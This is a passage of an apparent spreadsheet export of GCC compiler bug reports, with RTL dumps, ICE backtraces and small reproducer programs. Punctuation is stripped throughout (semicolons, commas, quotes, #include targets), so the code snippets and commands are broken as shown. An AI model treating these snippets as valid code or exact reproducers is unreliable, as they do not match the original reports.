        (plus:SI (reg:SI 2944 [ MEM[base: D.4806_3018 index: ivtmp.1254_3009 offset: 0B] ])
            (subreg/s:SI (reg/v:DI 454 [ nx+-4 ]) 4))) hsandt.f:200 78 {*addsi3_internal1}
     (expr_list:REG_DEAD (reg:SI 2944 [ MEM[base: D.4806_3018 index: ivtmp.1254_3009 offset: 0B] ])
        (expr_list:REG_EQUIV (mem:SI (plus:DI (reg/f:DI 4113)
                    (reg:DI 2445 [ D.4808 ])) [3 MEM[base: D.4809_3021 index: ivtmp.1232_213 offset: 0B]+0 S4 A32])
            (nil))))
...
(insn 6637 6632 6640 43 (set (mem:SI (plus:DI (reg/f:DI 4113)
                (reg:DI 2445 [ D.4808 ])) [3 MEM[base: D.4809_3021 index: ivtmp.1232_213 offset: 0B]+0 S4 A32])
        (reg:SI 2943 [ D.2378 ])) hsandt.f:200 377 {*movsi_internal1}
     (expr_list:REG_DEAD (reg/f:DI 4113)
        (expr_list:REG_DEAD (reg:SI 2943 [ D.2378 ])
            (nil))))
r186378:
(insn 6636 6631 6639 43 (set (reg:SI 2943 [ D.2378 ])
        (plus:SI (reg:SI 2944 [ MEM[base: D.4806_3018 index: ivtmp.1254_3009 offset: 0B] ])
            (subreg/s:SI (reg/v:DI 454 [ nx+-4 ]) 4))) hsandt.f:200 78 {*addsi3_internal1}
     (expr_list:REG_DEAD (reg:SI 2944 [ MEM[base: D.4806_3018 index: ivtmp.1254_3009 offset: 0B] ])
        (nil)))
...
(insn 6637 6632 6640 43 (set (mem:SI (plus:DI (reg/f:DI 4113)
                (reg:DI 2445 [ D.4808 ])) [3 MEM[base: D.4809_3021 index: ivtmp.1232_213 offset: 0B]+0 S4 A32])
        (reg:SI 2943 [ D.2378 ])) hsandt.f:200 377 {*movsi_internal1}
     (expr_list:REG_DEAD (reg/f:DI 4113)
        (expr_list:REG_DEAD (reg:SI 2943 [ D.2378 ])
            (nil))))
Note that insn 6636 no longer contains the REG_EQUIV note in r186378. Not sure of the significance yet but something I noticed.
194r.reload
r186377:
changing reg in insn 6636
changing reg in insn 6637
 Register 2943 now on stack.
...
(insn 6636 6631 8007 43 (set (reg:SI 18 18)
        (plus:SI (reg:SI 18 18 [orig:2944 MEM[base: D.4806_3018 index: ivtmp.1254_3009 offset: 0B] ] [2944])
            (reg:SI 11 11 [orig:454 nx ] [454]))) hsandt.f:200 78 {*addsi3_internal1}
     (expr_list:REG_EQUIV (mem:SI (plus:DI (reg/f:DI 19 19 [4113])
                (reg:DI 6 6 [orig:2445 D.4808 ] [2445])) [3 MEM[base: D.4809_3021 index: ivtmp.1232_213 offset: 0B]+0 S4 A32])
        (nil)))
(insn 8007 6636 6639 43 (set (mem/c:SI (plus:DI (reg/f:DI 19 19 [4113])
                (reg:DI 6 6 [orig:2445 D.4808 ] [2445])) [3 MEM[base: D.4809_3021 index: ivtmp.1232_213 offset: 0B]+0 S4 A32])
        (reg:SI 18 18)) hsandt.f:200 377 {*movsi_internal1}
     (nil))
r186378:
changing reg in insn 6636
changing reg in insn 6637
      Assigning 2943(freq=2) slot 13 of 524 2290
 Register 2943 now on stack.
...
(insn 6636 6631 8052 43 (set (reg:SI 18 18)
        (plus:SI (reg:SI 18 18 [orig:2944 MEM[base: D.4806_3018 index: ivtmp.1254_3009 offset: 0B] ] [2944])
            (reg:SI 11 11 [orig:454 nx ] [454]))) hsandt.f:200 78 {*addsi3_internal1}
     (nil))
(insn 8052 6636 6639 43 (set (mem/c:SI (plus:DI (reg/f:DI 1 1)
                (const_int 17664 [0x4500])) [32 %sfp+17664 S4 A64])
        (reg:SI 18 18)) hsandt.f:200 377 {*movsi_internal1}
     (nil))
In both cases insn 6637 is deleted but as you can see above r186378 stores to the stack and that value is not subsequently copied into the original target location of insn 6637.
I can provide more information/details if needed just don't know what to throw in that will be useful at the moment.
Configured with: /home/pthaugen/src/gcc/temp/gcc/configure --prefix=/home/pthaugen/install/gcc/temp --target=powerpc64-linux --host=powerpc64-linux --build=powerpc64-linux --enable-secureplt --enable-threads=posix --enable-shared --enable-__cxa_atexit --with-long-double-128 --enable-decimal-float --disable-alsa --enable-checking --with-lto --with-as=/home/pthaugen/install/binutils/binutils-2.21.1/bin/as --with-ld=/home/pthaugen/install/binutils/binutils-2.21.1/bin/ld --with-gmp=/home/pthaugen/install/gcc-host-libs --with-mpfr=/home/pthaugen/install/gcc-host-libs --with-mpc=/home/pthaugen/install/gcc-host-libs --with-ppl=/home/pthaugen/install/gcc-host-libs --with-cloog=/home/pthaugen/install/gcc-host-libs --with-host-libstdcxx=-Wl-Bstatic-L/home/pthaugen/install/gcc-host-libs/lib-lstdc++-Bdynamic-lm --enable-languages=cfortranc++ --disable-bootstrap</t>
  </si>
  <si>
    <t>GCC-4701</t>
  </si>
  <si>
    <t>imbue(locale(de_DE)) not working</t>
  </si>
  <si>
    <t>named locales cause core:
#include 
#include 
using namespace std
int main()
{
    cout.imbue(locale(de_DE))
}
Release:
x86-linux gcc-3.1</t>
  </si>
  <si>
    <t>GCC-2292</t>
  </si>
  <si>
    <t>gcc 2.95.2 ice when using derived template</t>
  </si>
  <si>
    <t>Internal compiler error when I have:
One member template derived from another which is derived
from an ordinary member class.  The error disappears if no
methods are defined in the most derived class.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Solaris 7 (sparc)
How-To-Repeat:
g++ -c try.cc</t>
  </si>
  <si>
    <t>jeffrey.schwab</t>
  </si>
  <si>
    <t>GCC-67846</t>
  </si>
  <si>
    <t>ICE on code with lambda expression on x86_64-linux-gnu in check_return_expr at cp/typeck.c:8609</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk on x86_64-linux-gnu.  
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20151004 (experimental) [trunk revision 228457] (GCC) 
$ 
$ g++-trunk -c small.cc
small.cc: In lambda function:
small.cc:5:23: error: invalid use of member function (did you forget the â€˜()â€™ ?)
     [=] { return foo }
                       ^
small.cc:5:23: internal compiler error: in check_return_expr at cp/typeck.c:8609
0x723c8d check_return_expr(tree_node* bool*)
	../../gcc-trunk/gcc/cp/typeck.c:8609
0x7610be finish_return_stmt(tree_node*)
	../../gcc-trunk/gcc/cp/semantics.c:873
0x705e44 cp_parser_lambda_body
	../../gcc-trunk/gcc/cp/parser.c:9855
0x705e44 cp_parser_lambda_expression
	../../gcc-trunk/gcc/cp/parser.c:9360
0x6d92b7 cp_parser_primary_expression
	../../gcc-trunk/gcc/cp/parser.c:4713
0x6e410b cp_parser_postfix_expression
	../../gcc-trunk/gcc/cp/parser.c:6404
0x6e4c99 cp_parser_unary_expression
	../../gcc-trunk/gcc/cp/parser.c:7689
0x6e58d7 cp_parser_binary_expression
	../../gcc-trunk/gcc/cp/parser.c:8442
0x6e5fdf cp_parser_assignment_expression
	../../gcc-trunk/gcc/cp/parser.c:8700
0x6e89f1 cp_parser_expression
	../../gcc-trunk/gcc/cp/parser.c:8854
0x6e9cb6 cp_parser_expression_statement
	../../gcc-trunk/gcc/cp/parser.c:10270
0x6ff07a cp_parser_statement
	../../gcc-trunk/gcc/cp/parser.c:10121
0x6ffee9 cp_parser_statement_seq_opt
	../../gcc-trunk/gcc/cp/parser.c:10393
0x70004b cp_parser_compound_statement
	../../gcc-trunk/gcc/cp/parser.c:10347
0x70025b cp_parser_function_body
	../../gcc-trunk/gcc/cp/parser.c:20112
0x70025b cp_parser_ctor_initializer_opt_and_function_body
	../../gcc-trunk/gcc/cp/parser.c:20148
0x7010f9 cp_parser_function_definition_after_declarator
	../../gcc-trunk/gcc/cp/parser.c:24755
0x704cdc cp_parser_late_parsing_for_member
	../../gcc-trunk/gcc/cp/parser.c:25559
0x6e0199 cp_parser_class_specifier_1
	../../gcc-trunk/gcc/cp/parser.c:20972
0x6e0199 cp_parser_class_specifier
	../../gcc-trunk/gcc/cp/parser.c:20998
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
--------------------------
class A
{
  void foo ()
  {
    [=] { return foo }
  }
}</t>
  </si>
  <si>
    <t>GCC-60607</t>
  </si>
  <si>
    <t>-march=native command line option handling breaks LTO option machinery</t>
  </si>
  <si>
    <t>Consider (-march=native is amdfam10):
markus@x4 tmp % cat foo.ii
markus@x4 tmp % cat bar.ii
typedef int __m128i __attribute__ ((__vector_size__ (16)))
__m128i a b c
void dequant_scaling () { c = __builtin_ia32_pmulld128 (a b) }
markus@x4 tmp % g++ -flto -fPIC -march=native -O2 -c foo.ii
markus@x4 tmp % g++ -flto -fPIC -march=native -O2 -msse4.1 -c bar.ii
markus@x4 tmp % g++ -flto -march=native -O2 -shared foo.o bar.o
bar.ii: In function â€˜dequant_scalingâ€™:
bar.ii:3:61: error: â€˜__builtin_ia32_pmulld128â€™ needs isa option -m32 -msse4.1
 void dequant_scaling () { c = __builtin_ia32_pmulld128 (a b) }
                                                             ^
lto-wrapper: /usr/x86_64-pc-linux-gnu/gcc-bin/4.9.0/g++ returned 1 exit status
Adding -msse4.1 to the final link step would fix the issue.
This causes e.g. media-libs/x265 build failures see: PR60568 comment13.</t>
  </si>
  <si>
    <t>GCC-1496</t>
  </si>
  <si>
    <t>gcc 2.95.2 results in runtime segmentation fault</t>
  </si>
  <si>
    <t>There is only one executable line in the code below. 
I used gcc test.c to compile i.e. no options. When I run
I get a segmentation fault.
a.out
Segmentation Fault (core dumped)
Release:
gcc version 2.95.2 19991024 (release)
Environment:
sparc-sun-solaris2.7/2.95.2
How-To-Repeat:
#include stdio.h
int main(void)
{
  int* a
  int* b
  *b = 3 
  return 0
}</t>
  </si>
  <si>
    <t>murali</t>
  </si>
  <si>
    <t>GCC-15472</t>
  </si>
  <si>
    <t>implicit open for unformatted file causes run-time error</t>
  </si>
  <si>
    <t>this from NIST test FM411.FOR
$ cat a.f
      READ (UNIT=9 END = 0023)  I
      STOP
 0023 CONTINUE
      END
$ gfortran a.f
$ ./a.out
At line 1 of file a.f
Fortran runtime error: Missing format for FORMATTED data transfer
$ g77 a.f
$ ./a.out
$ gfortran --version
GNU Fortran 95 (GCC 3.5.0 20040515 (experimental))</t>
  </si>
  <si>
    <t>GCC-78437</t>
  </si>
  <si>
    <t>[7 Regression] invalid sign-extend conversion in REE pass</t>
  </si>
  <si>
    <t>Created attachment 40092
Preprocessed source
Attached testcase triggers invalid sign-extend conversion in REE pass.
The problem can be triggered with a crosscompiler to alpha-linux-gnu using:
~/gcc-build-alpha/gcc/cc1 -O2 -std=c11 -mcpu=ev67 -mexplicit-relocs -fpreprocessed att.i
The _.split2 dump will have:
   ...
   50: $22:QI=$8:QI
      REG_EQUAL [`expected']
   43: [$2:DI+low(`expected')]=$8:QI
   51: $3:DI=sign_extend($22:QI)
   ...
this sequence is converted in REE pass:
Trying to eliminate extension:
(insn 51 43 53 7 (set (reg:DI 3 $3 [orig:110 expected ] [110])
        (sign_extend:DI (reg:QI 22 $22 [orig:111 expected ] [111]))) att.c:27 70 {*extendqidi2_bwx}
     (nil))
Tentatively merged extension with definition (copy needed):
(insn 50 52 43 7 (set (reg:DI 3 $3)
        (sign_extend:DI (reg:QI 8 $8 [106]))) att.c:27 -1
     (nil))
deferring rescan insn with uid = 50.
All merges were successful.
Eliminated the extension.
   ...
   50: $3:DI=sign_extend($8:QI)
  141: $22:DI=$3:DI
   43: [$2:DI+low(`expected')]=$8:QI
   ...
However $22 is used later in a DImode in:
(insn 63 62 65 8 (parallel [
            (set (reg:DI 7 $7 [119])
                (unspec_volatile:DI [
                        (const_int 0 [0])
                    ] UNSPECV_CMPXCHG))
            (set (reg:DI 3 $3 [123])
                (zero_extend:DI (unspec_volatile:QI [
                            (const_int 0 [0])
                        ] UNSPECV_CMPXCHG)))
            (set (mem/v:QI (reg/f:DI 1 $1 [138]) [-1  S1 A8])
                (unspec_volatile:QI [
                        (mem/v:QI (reg/f:DI 1 $1 [138]) [-1  S1 A8])
                        (reg:DI 22 $22 [orig:111 expected ] [111])
                        (const_int 0 [0])
                        (reg:DI 4 $4 [90])
                        (const_int 0 [0])
                        (const_int 3 [0x3])
                        (const_int 2 [0x2])
                    ] UNSPECV_CMPXCHG))
            (clobber (reg:DI 23 $23))
        ]) att.c:30 304 {atomic_compare_and_swapqi_1}
     (nil))
so the converted sequence is *not* equal as long as $22 is concerned.</t>
  </si>
  <si>
    <t>GCC-138</t>
  </si>
  <si>
    <t>egcs internal compiler error on dwarf-2</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Wed 15 Mar 2000 13:05:14 +0100
 Original-Message-ID: 
 System information:
 &gt; IRIX carlotta 6.5 07271713 IP22
 Command line:
 &gt; gcc -v --save-temps -g -O2 -c calc.c 2&gt; err &gt; out
 Error output:
 &gt;Reading specs from /usr/local/prog/gcc-2.95/lib/gcc-lib/mips-sgi-irix6.3/2.95/specs
 &gt;gcc version 2.95 19990728 (release)
 &gt;GNU CPP version 2.95 19990728 (release) [AL 1.1 MM 40] SGI running IRIX 6.x
 &gt;#include ... search starts here:
 &gt;#include  search starts here:
 &gt; /usr/local/include
 &gt; /usr/local/prog/gcc-2.95/lib/gcc-lib/mips-sgi-irix6.3/2.95/../../../../mips-sgi-irix6.3/include
 &gt; /usr/local/prog/gcc-2.95/lib/gcc-lib/mips-sgi-irix6.3/2.95/include
 &gt; /usr/include
 &gt;End of search list.
 &gt;The following default directories have been omitted from the search path:
 &gt; /usr/local/prog/gcc-2.95/lib/gcc-lib/mips-sgi-irix6.3/2.95/../../../../include/g++-3
 &gt;End of omitted list.
 &gt; /usr/local/prog/gcc-2.95/lib/gcc-lib/mips-sgi-irix6.3/2.95/cc1 calc.i -quiet -dumpbase calc.c -g -O2 -version -o calc.s
 &gt;GNU C version 2.95 19990728 (release) (mips-sgi-irix6.3) compiled by GNU C version 2.95 19990728 (release).
 &gt;calc.c: In function `calc_m':
 &gt;calc.c:89: Internal compiler error in `add_bound_info' at dwarf2out.c:7370
 &gt;Please submit a full bug report.
 &gt;See  for instructions.
 The preprocessed source code is attached.
Release:
2.95.2
How-To-Repeat:
See attachments for calc.i.bz2
</t>
  </si>
  <si>
    <t>GCC-19830</t>
  </si>
  <si>
    <t>cris-elf testsuite failure: gcc.c-torture/execute/920501-8.c execute tests.</t>
  </si>
  <si>
    <t>Regarding gcc.c-torture/execute/920501-8.c there's an extra 0 in the
1.000000 part.  Comparing to results for other targets (mmix frv) it seems
the core sprintf function is miscompiled!</t>
  </si>
  <si>
    <t>GCC-79911</t>
  </si>
  <si>
    <t>VEC_SELECT bugs in arm neon patterns</t>
  </si>
  <si>
    <t>I've recently posted http://gcc.gnu.org/ml/gcc-patches/2017-03/msg00183.html
with some extra verification of sanity of md patterns (based on assertions simplify-rtx.c does for VEC_SELECT as well as documentation requiring it).
With this patch make s-recog fails on arm-linux:
../../gcc/config/arm/neon.md:1338:1: element mode mismatch between vec_select HImode and its operand QImode                                    
../../gcc/config/arm/neon.md:1338:1: element mode mismatch between vec_select SImode and its operand QImode                                    
../../gcc/config/arm/neon.md:1338:1: element mode mismatch between vec_select QImode and its operand HImode                                    
../../gcc/config/arm/neon.md:1338:1: element mode mismatch between vec_select SImode and its operand HImode                                    
../../gcc/config/arm/neon.md:1338:1: element mode mismatch between vec_select QImode and its operand SImode                                    
../../gcc/config/arm/neon.md:1338:1: element mode mismatch between vec_select HImode and its operand SImode                                    
../../gcc/config/arm/neon.md:1353:1: element mode mismatch between vec_select HImode and its operand QImode                                    
../../gcc/config/arm/neon.md:1353:1: element mode mismatch between vec_select SImode and its operand QImode                                    
../../gcc/config/arm/neon.md:1353:1: element mode mismatch between vec_select QImode and its operand HImode                                    
../../gcc/config/arm/neon.md:1353:1: element mode mismatch between vec_select SImode and its operand HImode                                    
../../gcc/config/arm/neon.md:1353:1: element mode mismatch between vec_select QImode and its operand SImode                                    
../../gcc/config/arm/neon.md:1353:1: element mode mismatch between vec_select HImode and its operand SImode                                    
../../gcc/config/arm/neon.md:1407:1: element mode mismatch between vec_select HImode and its operand QImode                                    
../../gcc/config/arm/neon.md:1407:1: element mode mismatch between vec_select SImode and its operand QImode                                    
../../gcc/config/arm/neon.md:1407:1: element mode mismatch between vec_select QImode and its operand HImode                                    
../../gcc/config/arm/neon.md:1407:1: element mode mismatch between vec_select SImode and its operand HImode                                    
../../gcc/config/arm/neon.md:1407:1: element mode mismatch between vec_select QImode and its operand SImode                                    
../../gcc/config/arm/neon.md:1407:1: element mode mismatch between vec_select HImode and its operand SImode                                    
../../gcc/config/arm/neon.md:1422:1: element mode mismatch between vec_select HImode and its operand QImode                                    
../../gcc/config/arm/neon.md:1422:1: element mode mismatch between vec_select SImode and its operand QImode                                    
../../gcc/config/arm/neon.md:1422:1: element mode mismatch between vec_select QImode and its operand HImode                                    
../../gcc/config/arm/neon.md:1422:1: element mode mismatch between vec_select SImode and its operand HImode                                    
../../gcc/config/arm/neon.md:1422:1: element mode mismatch between vec_select QImode and its operand SImode                                    
../../gcc/config/arm/neon.md:1422:1: element mode mismatch between vec_select HImode and its operand SImode</t>
  </si>
  <si>
    <t>CLASSPATH-26322</t>
  </si>
  <si>
    <t>AElfred: Newline reference in attribute value is wrongly normalized</t>
  </si>
  <si>
    <t>A newline written as a character reference () in an attribute value is wrongly normalized to a single space. This is illustrated by the following XSLT 2.0 stylesheet:
&lt;xsl:stylesheet version=2.0
xmlns:xsl=http://www.w3.org/1999/XSL/Transform&gt;
When this is parsed using AElfred (and run using Saxon no source document required) it produces the incorrect output 
32
showing that the newline has been replaced by a space.</t>
  </si>
  <si>
    <t>GCC-48470</t>
  </si>
  <si>
    <t>ICE in expand_expr_addr_expr_1 at expr.c:6835</t>
  </si>
  <si>
    <t>Created attachment 23886
Proprocessed source (built with -E since -save-temps is an unrecognized option)
Version (output from --version since -v is apparently a verbose flag not a version flag):
GNU C (GCC) version 4.4.5 (arm-unknown-elf)
        compiled by GNU C version 3.4.4 (mingw special) GMP version 4.3.2 MPFR
 version 2.4.2.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Command line:
C:/Program Files/Rowley Associates Limited/CrossWorks for ARM 2.0/gcc/bin/cc1 -fmessage-length=0 -mcpu=arm7tdmi -mthumb-interwork -mlittle-endian -mfpu=vfp -mfloat-abi=soft -nostdinc -isystemC:/Program Files/Rowley Associates Limited/CrossWorks for ARM 2.0/include -isystemC:/Documents and Settings/sacleary/Local Settings/Application Data/Rowley Associates Limited/CrossWorks for ARM/packages/include -IC:/Code/v2/LN-200 IMU/../Components/include/FreeRTOS -IC:/Code/v2/LN-200 IMU/../Components/include/lwIP -IC:/Code/v2/LN-200 IMU/../Components/include/lwIP/ipv4 -IC:/Code/v2/LN-200 IMU/../Components/include/lwIP glue -I. -IC:/Code/v2/LN-200 IMU/../Components/include -IC:/Code/v2/LN-200 IMU/../Common -D__ARM_ARCH_4T__ -D__CROSSWORKS_ARM -D__CROSSWORKS_MAJOR_VERSION=2 -D__CROSSWORKS_MINOR_VERSION=0 -D__CROSSWORKS_REVISION=8 -D__TARGET_PROCESSOR=AT91SAM7X256 -DOSCILLATOR_CLOCK_FREQUENCY=18432000 -DBOARDINIPATH = imu.ini -DdefaultIPAddr = 0x0006000A -DdefaultCANAddr = 0x00100600 -DdefaultMacAddrA = 0x06 -DBOARD_ID = BOARD_TYPE_LN200 -D_DRIVES = 1 -D__THUMB -D__FLASH_BUILD -DNDEBUG -DSAM7_GCC -DTHUMB_INTERWORK -DSUPERVISOR_START -DSMARTPIGHARDWARE -MD FPGA ISR.d -MQ FPGA ISR.o -Werror -quiet -g1 -Wall -Wextra -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -fms-extensions -O1 -fno-dwarf2-cfi-asm -fno-builtin C:/Code/v2/LN-200 IMU/FPGA ISR.c</t>
  </si>
  <si>
    <t>gcc.ourteddybear</t>
  </si>
  <si>
    <t>GCC-63186</t>
  </si>
  <si>
    <t>[4.9 Regression] Undefined .L* symbols because of fnsplit</t>
  </si>
  <si>
    <t>Starting with r202185 the following testcase is compiled with undefined .L*
symbols at -O2:
void *a
int b c d
void
bar ()
{
  switch (c)
    {
    case 0:
    lab:
      __asm__ ()
      return
    default:
      break
    }
  b = 0
  d = 0
  a = 
}
void
foo ()
{
  bar ()
}
The problem is that find_split_points (visit_bb something else?) doesn't consider GIMPLE_LABEL stmts with FORCED_LABEL.  Either blocks with such labels should be immediately marked as inappropriate to stay in the caller part (i.e. non-fn.part.N) or we need to analyze whether nothing that would be moved to the fn.part.N function references labels that stay in fn.  Perhaps the other direction can be a problem too.  Honza can you please have a look?</t>
  </si>
  <si>
    <t>GCC-66216</t>
  </si>
  <si>
    <t>[6 Regression] Defaulted Operators and constructors not working with aligned attribute</t>
  </si>
  <si>
    <t>The code below will not compile faulting with defaulted declaration 'xx' does not match expected signature.
This behaviour is in any gcc version from 4.7 - 5
// g++ -std=c++11 -c  testalign.cpp
class CMymy
{
	unsigned char _a
	unsigned char _b
public:
	constexpr CMymy() : _a() _b() {}
	constexpr CMymy(const CMymy 
	CMymy 
} __attribute__((aligned(2)))</t>
  </si>
  <si>
    <t>npl</t>
  </si>
  <si>
    <t>GCC-58292</t>
  </si>
  <si>
    <t>ICE in ipa-devirt.c</t>
  </si>
  <si>
    <t>I use gcc with gdc to compile D language programs. With the latest git head I get compiler crash with:
internal compiler error: Segmentation fault
0x99b39f crash_signal
	../../gcc/gcc/toplev.c:335
0x8413ec tree_check
	../../gcc/gcc/tree.h:3689
0x8413ec get_odr_type(tree_node* bool)
	../../gcc/gcc/ipa-devirt.c:263
0x841ac2 build_type_inheritance_graph()
	../../gcc/gcc/ipa-devirt.c:360
0x6b6e21 analyze_functions
	../../gcc/gcc/cgraphunit.c:854
0x6b8285 finalize_compilation_unit()
	../../gcc/gcc/cgraphunit.c:2151
0x5fe5b4 d_write_global_declarations
	../../gcc/gcc/d/d-lang.cc:619
This occurs every time at the end of a class no matter what the class contains.
This is what I got from the gdc expert Iain:
Yep reproducible on current development snapshot...   raise a bug if
you haven't already done so.  Fix is simple enough (move generation of
BINFO out of toDebug as is required regardless of whether -g was sent
on the command-line).</t>
  </si>
  <si>
    <t>t.sintonen</t>
  </si>
  <si>
    <t>GCC-37211</t>
  </si>
  <si>
    <t>TRANSFER to characters: Size checking</t>
  </si>
  <si>
    <t>For the following gfortran should print:
  Intrinsic TRANSFER at %L has partly undefined result: 
  source size %ld &lt; result size %ld
but this does not work.
character(len=20) :: str
str = transfer(10str)
end
Ditto for character( KIND=4  len=20)</t>
  </si>
  <si>
    <t>GCC-14272</t>
  </si>
  <si>
    <t>[tree-ssa] miscompilation of __exchange_and_add (atomicity.h)</t>
  </si>
  <si>
    <t>The following piece of code (destilled from atomicity.h in
libstdc++-v3) is miscompiled by tree-ssa with -O2 on a sparc-sun-solaris2.9
platform (probably arch independant). The code outputs BUG!!! where
it clearly shouldn't. This works with C and C++.
====================== cut =============================
extern int printf (const char * ...)
int __attribute__ ((__noinline__))
__exchange_and_add (volatile int* __mem int __val)
{
  int __result __tmp
  __result = *__mem
  *__mem += __val
  return __result
}
int data = 0
int main ()
{
	if (__exchange_and_add (&amp;data 1) != 0) {
		printf (BUG!!!\n)
	}
	return 0
}
====================== cut =============================
The consequences in the context of libstdc++ on sparc-sun-solaris are
that std::cout and friends are never initialized i.e. not even a hello
world program runs. Note that the volatile keyword is crucial removing
it makes the bug go away. The wrong code first appears in .t35.optimized.
    regards   Christian</t>
  </si>
  <si>
    <t>GCC-44687</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in tree_nrv at tree-nrv.c:155 with -fprofile-generate</t>
  </si>
  <si>
    <t>Command line:
$ g++ -O2 -fprofile-generate testcase.C
Compiler output:
$ g++ -O2 -fprofile-generate testcase.C
testcase.C: In function 'B bar(B)':
testcase.C:16:1: internal compiler error: in tree_nrv at tree-nrv.c:155
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r161428 - crash
r161383 - crash
r161170 - OK</t>
  </si>
  <si>
    <t>GCC-11567</t>
  </si>
  <si>
    <t>C++ code containing templated member function with same name as pure virtual member function results in linking failure</t>
  </si>
  <si>
    <t>Attached C++ code contains a pure virtual function unpack() and a  a templated
function of the same name (but with different arguments). The presence of the
templated function causes linking to fail. Changing the name of the templated
function results in successful linking.
Implementing the unmarshal() (which calls the pure virtual function which
should result in a call to unpack() implemented in the derived class) function
in the header also allows for successful linking but I think this only hides
the bug.</t>
  </si>
  <si>
    <t>GCC-39851</t>
  </si>
  <si>
    <t>gcc -Q --help=target does not list extensions selected by -march=</t>
  </si>
  <si>
    <t>Even though -march=nocona enables SSE2 and SSE3 extensions gcc -Q --help=target does not list them as enabled.  This may be confusing to the user (see http://gcc.gnu.org/ml/gcc-help/2009-04/msg00293.html ):
$ gcc -Q --help=target -march=nocona | grep msse[23]
  -msse2                      		[disabled]
  -msse3                      		[disabled]
-msse[23] would be enabled in gcc/config/i386/i386.c:override_options() called from toplev.c:process_options() which is in turn called from do_compile().  OTOH --help=target is processed in decode_options() which is executed before do_compile.  It would be nice if --help=target processing could see options overridden by target backend.</t>
  </si>
  <si>
    <t>GCC-41018</t>
  </si>
  <si>
    <t>bootstrap broken on FreeBSD powerpc</t>
  </si>
  <si>
    <t>This patch: http://gcc.gnu.org/ml/gcc-cvs/2008-10/msg00471.html
broke bootstrap on powerpc targets which do not include svr4.h.
SVR4_ASM_SPEC is never defined.
This patch restores bootstrap tested on 4.4 branch and head.
http://gcc.gnu.org/ml/gcc-patches/2009-06/msg00421.html
Approval for this patch is here:
http://gcc.gnu.org/ml/gcc-patches/2009-08/msg00203.html
I will commit the patch nn both trees 4.4 and main with an adjusted ChangeLog within 24 hours if there are no objections.</t>
  </si>
  <si>
    <t>GCC-49107</t>
  </si>
  <si>
    <t>[C++0x][4.7 Regression] incomplete type regression with std::pair</t>
  </si>
  <si>
    <t>Hello
this code very recently stopped compiling. I am reporting it against libstdc++ because it uses std::pair but feel free to reassign to the C++ FE if appropriate I didn't have time to investigate further.
#include 
template 
struct VectorH3
{
  typedef typename R_::RT                   RT
  typedef typename R_::Ray_3                Ray_3
  typedef typename R_::Line_3               Line_3
  VectorH3() {}
  VectorH3(const Ray_3 
  VectorH3(const Line_3 
  VectorH3(const RT
}
template 
class RayH3
{
   typedef typename R_::Point_3              Point_3
   typedef typename R_::Vector_3             Vector_3
   typedef std::pair             Rep
   Rep base
}
template 
struct LineC3
{
  typedef typename R_::Point_3              Point_3
  typedef typename R_::Vector_3             Vector_3
  typedef std::pair             Rep
  Rep base
}
template 
struct Homogeneous_base
{
    typedef double                                  RT
    struct Point_3{}
    typedef VectorH3                        Vector_3
    typedef LineC3                          Line_3
    typedef RayH3                           Ray_3
    struct Construct_vector_3
    {
	Vector_3 operator()(const RT&amp; x const RT&amp; y const RT&amp; z const RT&amp; w) const
	{ return Vector_3(x y z w) }
    }
}
struct Simple_homogeneous
  : public Homogeneous_base
{}
int main()
{
  Simple_homogeneous::Construct_vector_3()( 8 2 4 1)
}
$ c++ -std=gnu++0x -c Simple_homogeneous.cpp
Simple_homogeneous.cpp: In instantiation of 'LineC3':
/tmp/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/type_traits:730:46:   instantiated from 'std::__is_direct_constructible_impl VectorH3&amp;&amp;&gt;'
/tmp/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/type_traits:79:12:   instantiated from 'std::__and_ &gt; std::__is_direct_constructible_impl VectorH3&amp;&amp;&gt; &gt;'
/tmp/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/type_traits:734:12:   instantiated from 'std::__is_direct_constructible_new_safe VectorH3&amp;&amp;&gt;'
/tmp/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/type_traits:806:12:   instantiated from 'std::__is_direct_constructible_new VectorH3&amp;&amp;&gt;'
/tmp/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/type_traits:814:12:   instantiated from 'std::__is_direct_constructible VectorH3&amp;&amp;&gt;'
/tmp/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/type_traits:853:12:   [ skipping 4 instantiation contexts ]
/tmp/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/type_traits:981:12:   instantiated from 'std::__is_nothrow_move_constructible_impl false&gt;'
/tmp/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/type_traits:987:12:   instantiated from 'std::is_nothrow_move_constructible &gt;'
/tmp/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/bits/stl_pair.h:185:7:   instantiated from 'std::pair::Point_3 VectorH3 &gt;'
Simple_homogeneous.cpp:21:8:   instantiated from 'RayH3'
Simple_homogeneous.cpp:44:30:   instantiated from 'Homogeneous_base::Vector_3 Homogeneous_base::Construct_vector_3::operator()(const RT&amp; const RT&amp; const RT&amp; const RT&amp;) const [with Kernel = Simple_homogeneous Homogeneous_base::Vector_3 = VectorH3 Homogeneous_base::RT = double]'
Simple_homogeneous.cpp:54:55:   instantiated from here
